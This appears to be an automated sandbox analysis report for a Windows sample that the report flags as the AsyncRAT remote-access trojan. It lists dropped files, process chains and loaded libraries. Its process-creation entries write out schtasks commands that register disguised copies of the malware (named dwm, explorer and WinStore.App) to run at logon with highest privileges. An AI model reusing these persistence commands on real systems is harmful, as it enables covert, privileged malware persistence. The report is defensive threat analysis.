Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006EE8A0	0_2_006EE8A0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006EF968	0_2_006EF968
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_00704969	0_2_00704969
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006F6A7B	0_2_006F6A7B
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006F3A3C	0_2_006F3A3C
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_0070CB60	0_2_0070CB60
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_00700B43	0_2_00700B43
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006F5C77	0_2_006F5C77
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006F3D6D	0_2_006F3D6D
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006EED14	0_2_006EED14
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006FFDFA	0_2_006FFDFA
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006EDE6C	0_2_006EDE6C
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006EBE13	0_2_006EBE13
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_00700F78	0_2_00700F78
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006E5F3C	0_2_006E5F3C

Source: Joe Sandbox View	Dropped File: C:\Recovery\jOMfQSwRhTi.exe 91167E5876C370F49654A0749590B162B9432108940F84CF77690E26E367955C
Source: Joe Sandbox View	Dropped File: C:\Users\Public\AccountPictures\jOMfQSwRhTi.exe 91167E5876C370F49654A0749590B162B9432108940F84CF77690E26E367955C
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe 91167E5876C370F49654A0749590B162B9432108940F84CF77690E26E367955C
Source: Joe Sandbox View	Dropped File: C:\Users\user\jOMfQSwRhTi.exe 91167E5876C370F49654A0749590B162B9432108940F84CF77690E26E367955C

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: String function: 006FE360 appears 52 times
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: String function: 006FED00 appears 31 times
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: String function: 006FE28C appears 35 times

Source: LisectAVT_2403002A_442.exe

Binary or memory string: OriginalFilenametelescop.exe$ vs LisectAVT_2403002A_442.exe

Source: LisectAVT_2403002A_442.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000005.00000002.1438279004.00000000132C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: perfCrtmonitorsvcMonitorDll.exe PID: 7728, type: MEMORYSTR	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: perfCrtmonitorsvcMonitorDll.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: jOMfQSwRhTi.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WinStore.App.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: explorer.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: jOMfQSwRhTi.exe0.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dwm.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@28/22@1/1

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe

Code function: 0_2_006E6EC9 GetLastError,FormatMessageW,

0_2_006E6EC9

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe

Code function: 0_2_006F9E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_006F9E1C

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe

File created: C:\Users\user\jOMfQSwRhTi.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
Source: C:\Windows\hh\explorer.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Windows\hh\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\ae1e7402ff59b2628ad8c21a27af6bc37000b8ae

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe

File created: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Jg3j8KEAq3O.bat" "

Source: unknown	Process created: C:\Windows\hh\explorer.exe
Source: unknown	Process created: C:\Windows\hh\explorer.exe

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Command line argument: sfxname	0_2_006FD5D4
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Command line argument: sfxstime	0_2_006FD5D4
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Command line argument: STARTDLG	0_2_006FD5D4
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Command line argument: xjs	0_2_006FD5D4

Source: LisectAVT_2403002A_442.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: LisectAVT_2403002A_442.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe

File read: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe "C:\Users\user\Desktop\LisectAVT_2403002A_442.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Jg3j8KEAq3O.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe"
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\System32\WWanAPI\dwm.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jOMfQSwRhTi" /sc ONLOGON /tr "'C:\Users\user\jOMfQSwRhTi.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jOMfQSwRhTi" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\jOMfQSwRhTi.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Windows\ShellNew\WinStore.App.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\hh\explorer.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jOMfQSwRhTi" /sc ONLOGON /tr "'C:\Recovery\jOMfQSwRhTi.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\AivFMEfd19.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown	Process created: C:\Windows\System32\WWanAPI\dwm.exe C:\Windows\System32\WWanAPI\dwm.exe
Source: unknown	Process created: C:\Windows\hh\explorer.exe C:\Windows\hh\explorer.exe
Source: unknown	Process created: C:\Recovery\jOMfQSwRhTi.exe C:\Recovery\jOMfQSwRhTi.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\ShellNew\WinStore.App.exe "C:\Windows\ShellNew\WinStore.App.exe"
Source: unknown	Process created: C:\Windows\System32\WWanAPI\dwm.exe "C:\Windows\System32\WWanAPI\dwm.exe"
Source: unknown	Process created: C:\Recovery\jOMfQSwRhTi.exe "C:\Recovery\jOMfQSwRhTi.exe"
Source: unknown	Process created: C:\Windows\hh\explorer.exe "C:\Windows\hh\explorer.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Jg3j8KEAq3O.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\AivFMEfd19.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\ShellNew\WinStore.App.exe "C:\Windows\ShellNew\WinStore.App.exe"	Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
